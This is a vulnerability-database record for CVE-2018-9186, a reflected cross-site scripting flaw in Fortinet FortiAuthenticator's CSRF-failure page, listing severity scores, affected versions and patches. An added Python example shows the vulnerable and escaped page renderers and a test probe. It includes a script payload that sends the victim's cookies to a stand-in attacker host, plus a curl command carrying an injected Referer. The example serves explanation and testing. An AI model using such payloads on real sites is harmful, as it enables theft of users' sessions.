ID

VAR-201805-1018


CVE

CVE-2018-9186


TITLE

Fortinet FortiAuthenticator Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2018-005463

DESCRIPTION

A cross-site scripting (XSS) vulnerability in the "CSRF validation failure" page of Fortinet FortiAuthenticator versions 4.0.0 to before 5.3.0 allows an attacker to execute unauthorized script code by injecting a malicious script into the HTTP Referer header, which the failure page reflects into its HTML. The Referer is attacker-controlled (a victim's browser sends it when following a link from an attacker-controlled page), so exploitation requires user interaction but no authentication. A successful attack may disclose or alter information, including theft of cookie-based authentication credentials, and enable further attacks in the victim's browser session. Fortinet FortiAuthenticator is a user identity management appliance that strengthens enterprise security by centralizing the management and storage of user identity information; combined with FortiToken (a two-factor authentication token) it provides two-factor authentication to third-party devices that authenticate via RADIUS or LDAP. Versions prior to FortiAuthenticator 5.3.0 are affected; 5.3.0 fixes the issue.

Trust: 2.52

sources: NVD: CVE-2018-9186 // JVNDB: JVNDB-2018-005463 // CNVD: CNVD-2018-10945 // BID: 104371 // VULHUB: VHN-139218
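The pattern described above, a CSRF-failure page that reflects the raw Referer header, is shown here as an added example (not FortiAuthenticator code, and not taken from the advisory). The form field name `csrfmiddlewaretoken`, the token value, the attacker origin and the payload are all constructed assumptions; the point is the vulnerable renderer beside the escaped one and a probe a tester can run against any such error page.

```python
import html
import hmac

# Constructed sample values (not from the advisory): a session-bound CSRF
# token and a Referer carrying an XSS payload, as an attacker-controlled
# page could cause a victim's browser to send it.
SESSION_CSRF_TOKEN = "5f3c9a1e2b7d4c6e"
XSS_PAYLOAD = (
    "<script>document.location='https://attacker.example/?c='"
    "+document.cookie</script>"
)


def render_csrf_failure_vulnerable(referer):
    """Reflects the raw Referer into the error page: the vulnerable pattern."""
    return (
        "<html><body><h1>CSRF validation failure</h1>"
        f"<p>The request referred from {referer} was rejected.</p>"
        "</body></html>"
    )


def render_csrf_failure_fixed(referer):
    """Same page with the Referer HTML-escaped before it is inserted.
    quote=True also escapes ' and " so the value is safe inside attributes."""
    safe = html.escape(referer, quote=True)
    return (
        "<html><body><h1>CSRF validation failure</h1>"
        f"<p>The request referred from {safe} was rejected.</p>"
        "</body></html>"
    )


def handle_post(headers, form, session_token, render):
    """Minimal CSRF check (hypothetical handler, not the product's code).

    A token mismatch routes the request to the failure page, which is
    exactly where the attacker-controlled Referer ends up being rendered.
    Returns (status, body)."""
    submitted = form.get("csrfmiddlewaretoken", "")
    if not hmac.compare_digest(submitted, session_token):
        return 403, render(headers.get("Referer", ""))
    return 200, "<html><body>OK</body></html>"


def referer_is_reflected(render, payload):
    """Probe: send a Referer carrying the payload and check whether the
    rendered page contains it verbatim (i.e. unescaped)."""
    referer = f"https://attacker.example/{payload}"
    return payload in render(referer)


if __name__ == "__main__":
    for name, render in (("vulnerable", render_csrf_failure_vulnerable),
                         ("fixed", render_csrf_failure_fixed)):
        print(f"{name}: payload reflected = "
              f"{referer_is_reflected(render, XSS_PAYLOAD)}")
```

Against a live target the same probe is a request with the CSRF token deliberately omitted and a hand-set Referer (for example `curl -H 'Referer: https://attacker.example/<svg onload=alert(1)>'`), followed by a search of the response body for the unescaped marker. One caveat when assessing real-world exploitability: current browsers default to the `strict-origin-when-cross-origin` referrer policy, which sends only the origin on cross-origin requests, so a path-borne payload reaches the target only when the attacker page relaxes the policy (for instance `<meta name="referrer" content="unsafe-url">`); the reflection itself is still the bug to fix.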

IOT TAXONOMY

category: ['Network device'], sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2018-10945

AFFECTED PRODUCTS

vendor: fortinet, model: fortiauthenticator, scope: lt, version: 5.3.0

Trust: 2.4

vendor: fortinet, model: fortiauthenticator, scope: gte, version: 4.0.0

Trust: 1.0

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 3.0.0

Trust: 0.9

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 5.2

Trust: 0.3

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 5.1

Trust: 0.3

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 5.0

Trust: 0.3

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 4.3

Trust: 0.3

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 4.2

Trust: 0.3

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 3.2.1

Trust: 0.3

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 3.2

Trust: 0.3

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 3.1

Trust: 0.3

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 3.0.2

Trust: 0.3

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 3.0

Trust: 0.3

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 2.0

Trust: 0.3

vendor: fortinet, model: fortiauthenticator, scope: eq, version: 1.0

Trust: 0.3

vendor: fortinet, model: fortiauthenticator, scope: ne, version: 5.3

Trust: 0.3

Trust: 0.3

sources: CNVD: CNVD-2018-10945 // BID: 104371 // JVNDB: JVNDB-2018-005463 // CNNVD: CNNVD-201805-1164 // NVD: CVE-2018-9186

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-9186
value: MEDIUM

Trust: 1.0

NVD: CVE-2018-9186
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2018-10945
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201805-1164
value: MEDIUM

Trust: 0.6

VULHUB: VHN-139218
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2018-9186
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2018-10945
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-139218
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-9186
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2018-10945 // VULHUB: VHN-139218 // JVNDB: JVNDB-2018-005463 // CNNVD: CNNVD-201805-1164 // NVD: CVE-2018-9186

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-139218 // JVNDB: JVNDB-2018-005463 // NVD: CVE-2018-9186

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201805-1164

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-201805-1164

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-005463

PATCH

title: FG-IR-18-059, url: https://fortiguard.com/psirt/FG-IR-18-059

Trust: 0.8

title: Patch for Fortinet FortiAuthenticator Cross-Site Scripting Vulnerability (CNVD-2018-10945), url: https://www.cnvd.org.cn/patchInfo/show/131119

Trust: 0.6

title: Fortinet FortiAuthenticator fixes for cross-site scripting vulnerability, url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81182

Trust: 0.6

sources: CNVD: CNVD-2018-10945 // JVNDB: JVNDB-2018-005463 // CNNVD: CNNVD-201805-1164

EXTERNAL IDS

db: NVD, id: CVE-2018-9186

Trust: 3.4

db: BID, id: 104371

Trust: 2.0

db: JVNDB, id: JVNDB-2018-005463

Trust: 0.8

db: CNNVD, id: CNNVD-201805-1164

Trust: 0.7

db: CNVD, id: CNVD-2018-10945

Trust: 0.6

db: VULHUB, id: VHN-139218

Trust: 0.1

sources: CNVD: CNVD-2018-10945 // VULHUB: VHN-139218 // BID: 104371 // JVNDB: JVNDB-2018-005463 // CNNVD: CNNVD-201805-1164 // NVD: CVE-2018-9186

REFERENCES

url:http://www.securityfocus.com/bid/104371

Trust: 1.7

url:https://fortiguard.com/advisory/fg-ir-18-059

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2018-9186

Trust: 1.4

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-9186

Trust: 0.8

url:http://www.fortinet.com/

Trust: 0.3

url:https://fortiguard.com/psirt/fg-ir-18-059

Trust: 0.3

sources: CNVD: CNVD-2018-10945 // VULHUB: VHN-139218 // BID: 104371 // JVNDB: JVNDB-2018-005463 // CNNVD: CNNVD-201805-1164 // NVD: CVE-2018-9186

CREDITS

Arun Narayanan

Trust: 0.3

sources: BID: 104371

SOURCES

db: CNVD, id: CNVD-2018-10945
db: VULHUB, id: VHN-139218
db: BID, id: 104371
db: JVNDB, id: JVNDB-2018-005463
db: CNNVD, id: CNNVD-201805-1164
db: NVD, id: CVE-2018-9186

LAST UPDATE DATE

2024-08-14T14:12:52.255000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2018-10945, date: 2018-06-05T00:00:00
db: VULHUB, id: VHN-139218, date: 2019-04-22T00:00:00
db: BID, id: 104371, date: 2018-05-31T00:00:00
db: JVNDB, id: JVNDB-2018-005463, date: 2018-07-18T00:00:00
db: CNNVD, id: CNNVD-201805-1164, date: 2019-04-23T00:00:00
db: NVD, id: CVE-2018-9186, date: 2019-04-22T18:32:14.473

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2018-10945, date: 2018-06-05T00:00:00
db: VULHUB, id: VHN-139218, date: 2018-05-31T00:00:00
db: BID, id: 104371, date: 2018-05-31T00:00:00
db: JVNDB, id: JVNDB-2018-005463, date: 2018-07-18T00:00:00
db: CNNVD, id: CNNVD-201805-1164, date: 2018-05-31T00:00:00
db: NVD, id: CVE-2018-9186, date: 2018-05-31T22:29:00.253